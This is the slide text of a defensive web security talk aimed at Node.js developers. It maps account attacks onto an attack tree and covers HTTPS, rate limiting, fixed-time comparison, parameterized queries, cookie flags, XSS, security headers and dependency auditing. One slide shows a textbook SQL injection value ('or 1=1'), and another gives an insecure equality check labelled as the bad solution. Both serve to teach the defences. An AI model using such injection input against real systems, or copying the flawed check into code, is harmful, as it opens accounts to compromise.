Gergely Nemeth

Surviving Web Security

github.com/gergely | twitter.com/nthgergo | gergely@risingstack.com

TRACE - NODE.JS MONITORING

https://trace.risingstack.com

WHAT DO THEY HAVE IN COMMON?

WHAT DO THEY HAVE IN COMMON?

TOGETHER, ALMOST 1 BILLION USER ACCOUNTS COMPROMISED

https://haveibeenpwned.com

2014/2015 In Retrospect

Lots of high-profile vulnerabilities such as

Shellshock

Hearthbleed

an average of

158 days time-to-fix security issues

in some industries security tickets may be

open for morethan 2 years

XSS affects 47%CRFS affects 24%

of all web apps.

Enter Attack Trees

ATTACK TREES

“formal, methodical way of describing the security of systems, based on varying attacks”

Bruce Schneier

ATTACK TREESOpen safe

Pick lock Learn combo Cut open Bad setup

Find it written Learn from target

Blackmail Eavesdrop Bribe

Listen to convo Get target to say

ATTACK TREES

to get the most out of attack trees, you have to combine them with knowledge on the attackers

ATTACK TREESOpen safe (P)

Pick lock (I) Learn combo (P) Cut open (P) Bad setup (I)

Find it written (I) Learn from target (P)

Blackmail (I) Eavesdrop (I) Bribe (P)

Listen to convo (P) Get target to say (I)

An Example Attack Tree of a Trace Account

EXAMPLE ATTACK TREE OF A TRACE ACCOUNTGet access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency

EXAMPLE ATTACK TREE OF A TRACE ACCOUNT

Secure the Transport Layer

SECURE TRANSPORT LAYERGet access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency

SECURE TRANSMISSION - SSL

HTTP is a clear-text protocol

SECURE TRANSMISSION - SSL

Vulnerable against man-in-the-middle attacks

SECURE TRANSMISSION - SSL

HTTP is a clear-text protocol - Always use HTTPS

Defend Against Brute-force attacks

BRUTE-FORCE ATTACKSGet access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency

BRUTE-FORCE PROTECTION

var email = req.body.email var limit = new Limiter({ id: email, db: db })

limit.get(function(err, limit) {

})

BRUTE-FORCE PROTECTION - TIMING ATTACKS

// the bad solution

if (userEnteredPassword === passwordFromDb) { return true}

return false

BRUTE-FORCE PROTECTION - TIMING ATTACKS

T R A C E T R A C E

T R A C E T R I C Kx

PASSWORDS - EQUALITY CHECK

Always use fixed-time comparison

BRUTE-FORCE PROTECTION - TIMING ATTACKS// the good solutionvar cryptiles = require('cryptiles')

if (cryptiles.fixedTimeComparison( userEnteredPassword, passwordFromDb)) { return true}

return false

Defend Against SQL Injection Attacks

SQL INJECTIONGet access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency

DATA VALIDATION - SQL INJECTION

This attack vector consists of injection of a partial or complete SQL query via user input

DATA VALIDATION - SQL INJECTION

select username, password from users where username=$username

can become:

select username, password from users where username=john or 1=1

DATA VALIDATION - SQL INJECTION

Defend against it withparameterized queries / prepared statements

DATA VALIDATION - SQL INJECTION

// paramaterized query( "select name from emp where emp_id=$1", [123] ) // prepared query( { name:"emp_name", text:"select name from emp where emp_id=$1", values:[123] })

Defend Against Session Hijack

SESSION HIJACKGet access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency

Securing Cookies

COOKIES - COOKIE FLAGS

- secure - this attribute tells the browser to only send the cookie if the

request is being sent over HTTPS.

- HttpOnly - this attribute is used to help prevent attacks such as cross-

site scripting, since it does not allow the cookie to be accessed via

JavaScript.

Unwanted Javascript

DATA VALIDATION - XSS

- Reflected Cross Site Scripting occurs when the attacker injects

executable JavaScript code into the HTML response with specially

crafted links

- Stored Cross Site Scripting occurs when the application stores user

input which is not correctly filtered. It runs within the user’s browser

under the privileges of the web application.

DATA VALIDATION - XSS

Defend against it with input validation

SECURITY HEADERS

- Strict-Transport-Security enforces secure (HTTP over SSL/TLS)

connections to the server

- X-Frame-Options provides clickjacking protection

- X-XSS-Protection enables the Cross-site scripting (XSS) filter built into

most recent web browsers

- Content-Security-Policy prevents a wide range of attacks, including

Cross-site scripting and other cross-site injections

Handling Dependencies

HANDLING DEPENDENCIESGet access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency

HANDLING DEPENDENCIES

You are what you require

HANDLING DEPENDENCIES

Use retire.js / the NSP CLI

https://nodesecurity.io

HANDLING DEPENDENCIES

Update your dependencies frequently

https://greenkeeper.io

Environment Setup

RESTRICT DATABASE ACCESSGet access to account

Modify credentials in the database

Learn password

Get access to database

Social engineering

Get access to DMZ

Listen on the transport layer

Brute force

Bypass access control

SQL Injection

Session hijack

Insecure dependency

ENVIRONMENT SETUP

Put your databases inside a VPN with your application servers

ENVIRONMENT SETUP

Be careful with default passwords

ENVIRONMENT SETUP

At least 6.000+ Redis instances are compromised now

The Human Factor

95% of all security incidents involve human error

We are the weakest link

Security must be part of the agile workflow

Stories should include acceptance criteria for security

Given an unauthenticated userWhen tries to view her profileThen redirected to the login

EXAMPLE STORY

Developers should implement features with security requirements in mind

Developers should implement features with security requirements in mind

LIKEOWASP TOP 10

https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet

Injection

Weak authentication and session management

XSSInsecure Direct Object References

Security Misconfiguration

Sensitive Data Exposure

Missing Function Level Access Control

Cross Site Request Forgery

Using Components with Known Vulnerabilities

Unvalidated Redirects and Forwards

Security is part of your job!